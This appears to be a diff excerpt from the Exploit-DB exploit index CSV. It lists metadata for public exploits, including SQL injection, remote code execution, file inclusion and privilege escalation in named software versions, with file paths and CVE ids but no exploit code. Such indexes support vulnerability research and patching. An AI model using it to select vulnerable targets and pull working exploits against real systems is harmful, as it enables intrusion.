38825,exploits/multiple/remote/38825.xml,"IBM Cognos Business Intelligence - XML External Entity Information Disclosure",2013-10-11,IBM,remote,multiple,,2013-10-11,2015-11-30,1,CVE-2013-4034;OSVDB-99742,,,,,https://www.securityfocus.com/bid/63719/info
35918,exploits/multiple/remote/35918.c,"IBM DB2 - 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",remote,multiple,,2011-06-30,2015-01-27,1,,,,,,https://www.securityfocus.com/bid/48514/info
20472,exploits/multiple/remote/20472.txt,"IBM DB2 - Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password",2000-12-05,benjurry,remote,multiple,,2000-12-05,2012-08-13,1,CVE-2001-0051;OSVDB-9484,,,,,https://www.securityfocus.com/bid/2068/info
@ -15447,6 +15453,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50306,exploits/php/webapps/50306.py,"Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-09-20,"Abdullah Khawaja",webapps,php,,2021-09-20,2021-09-20,0,,,,,,
50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",2021-07-09,"Eleonora Guardini",webapps,php,,2021-07-09,2021-07-09,0,,,,,,
50965,exploits/php/webapps/50965.txt,"ChurchCRM 4.4.5 - SQLi",2022-06-14,nu11secur1ty,webapps,php,,2022-06-14,2022-06-14,0,CVE-2022-31325,,,,,
51319,exploits/php/webapps/51319.py,"ChurchCRM 4.5.1 - Authenticated SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24787,,,,,
51296,exploits/php/webapps/51296.txt,"ChurchCRM v4.5.3-121fcc1 - SQL Injection",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,,
15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip,
36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php,,2012-02-22,2015-05-01,1,CVE-2012-1001;OSVDB-79456,,,,,https://www.securityfocus.com/bid/52115/info
@ -24257,6 +24264,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8504,exploits/php/webapps/8504.txt,"NotFTP 1.3.1 - 'newlang' Local File Inclusion",2009-04-21,Kacper,webapps,php,,2009-04-20,,1,OSVDB-54124;CVE-2009-1407,,,,,
17296,exploits/php/webapps/17296.txt,"NoticeBoardPro 1.0 - Multiple Vulnerabilities",2011-05-16,"AutoSec Tools",webapps,php,,2011-05-16,2011-05-21,1,OSVDB-72366;OSVDB-72365,,,,http://www.exploit-db.comNoticeBoardPro.zip,
31902,exploits/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection",2008-06-10,t@nzo0n,webapps,php,,2008-06-10,2014-02-26,1,,,,,,https://www.securityfocus.com/bid/29655/info
51318,exploits/php/webapps/51318.py,"NotrinosERP 0.7 - Authenticated Blind SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24788,,,,,
11832,exploits/php/webapps/11832.txt,"NotSopureEdit 1.4.1 - Remote File Inclusion",2010-03-21,cr4wl3r,webapps,php,,2010-03-20,,1,OSVDB-63122;CVE-2010-1216,,,,,
36696,exploits/php/webapps/36696.txt,"Nova CMS - '/administrator/modules/moduleslist.php?id' Remote File Inclusion",2012-02-11,indoushka,webapps,php,,2012-02-11,2015-04-10,1,CVE-2012-1200;OSVDB-79555,,,,,https://www.securityfocus.com/bid/51976/info
36698,exploits/php/webapps/36698.txt,"Nova CMS - '/includes/function/gets.php?Filename' Remote File Inclusion",2012-02-11,indoushka,webapps,php,,2012-02-11,2015-04-10,1,CVE-2012-1200;OSVDB-79556,,,,,https://www.securityfocus.com/bid/51976/info
@ -28627,6 +28635,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE (1)",2020-12-11,coiffeur,webapps,php,,2020-12-11,2021-02-18,0,CVE-2020-11819,,,,,
48784,exploits/php/webapps/48784.py,"Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)",2020-09-02,danyx07,webapps,php,,2020-09-02,2021-02-18,0,CVE-2020-11819,,,,,
51121,exploits/php/webapps/51121.txt,"rukovoditel 3.2.1 - Cross-Site Scripting (XSS)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
51322,exploits/php/webapps/51322.txt,"Rukovoditel 3.3.1 - Remote Code Execution (RCE)",2023-04-07,"Mirabbas Ağalarov",webapps,php,,2023-04-07,2023-04-07,0,,,,,,
46608,exploits/php/webapps/46608.txt,"Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting",2019-03-26,"Javier Olmedo",webapps,php,80,2019-03-26,2019-03-26,0,CVE-2019-7400,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comrukovoditel_2.4.zip,https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/
45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80,2018-10-16,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comrukovoditel_2.3.zip,
46011,exploits/php/webapps/46011.rb,"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)",2018-12-19,AkkuS,webapps,php,,2018-12-19,2019-03-06,0,CVE-2018-20166,"Metasploit Framework (MSF)",,,http://www.exploit-db.comrukovoditel_2.3.1.zip,
@ -41413,6 +41422,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47568,exploits/windows/local/47568.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)",2019-10-31,4ll4u,local,windows,,2019-10-31,2019-10-31,0,,"Buffer Overflow",,,http://www.exploit-db.comallok_wmvconverter.exe,
47647,exploits/windows/local/47647.txt,"Wondershare Application Framework Service - _WsAppService_ Unquote Service Path",2019-11-12,chuyreds,local,windows,,2019-11-12,2019-11-12,0,,,,,,
47617,exploits/windows/local/47617.txt,"Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path",2019-11-12,chuyreds,local,windows,,2019-11-12,2019-11-12,0,,,,,,
51324,exploits/windows/local/51324.txt,"Wondershare Dr Fone 12.9.6 - Privilege Escalation",2023-04-07,"Thurein Soe",local,windows,,2023-04-07,2023-04-07,0,CVE-2023-27010,,,,,
50903,exploits/windows/local/50903.txt,"Wondershare Dr.Fone 11.4.10 - Insecure File Permissions",2022-05-11,AkuCyberSec,local,windows,,2022-05-11,2022-05-11,0,,,,,,
50755,exploits/windows/local/50755.txt,"Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path",2022-02-18,"Luis Martínez",local,windows,,2022-02-18,2022-02-18,0,,,,,,
50813,exploits/windows/local/50813.txt,"Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path",2022-03-09,"Mohamed Alzhrani",local,windows,,2022-03-09,2022-03-09,0,,,,,,

Can't render this file because it is too large.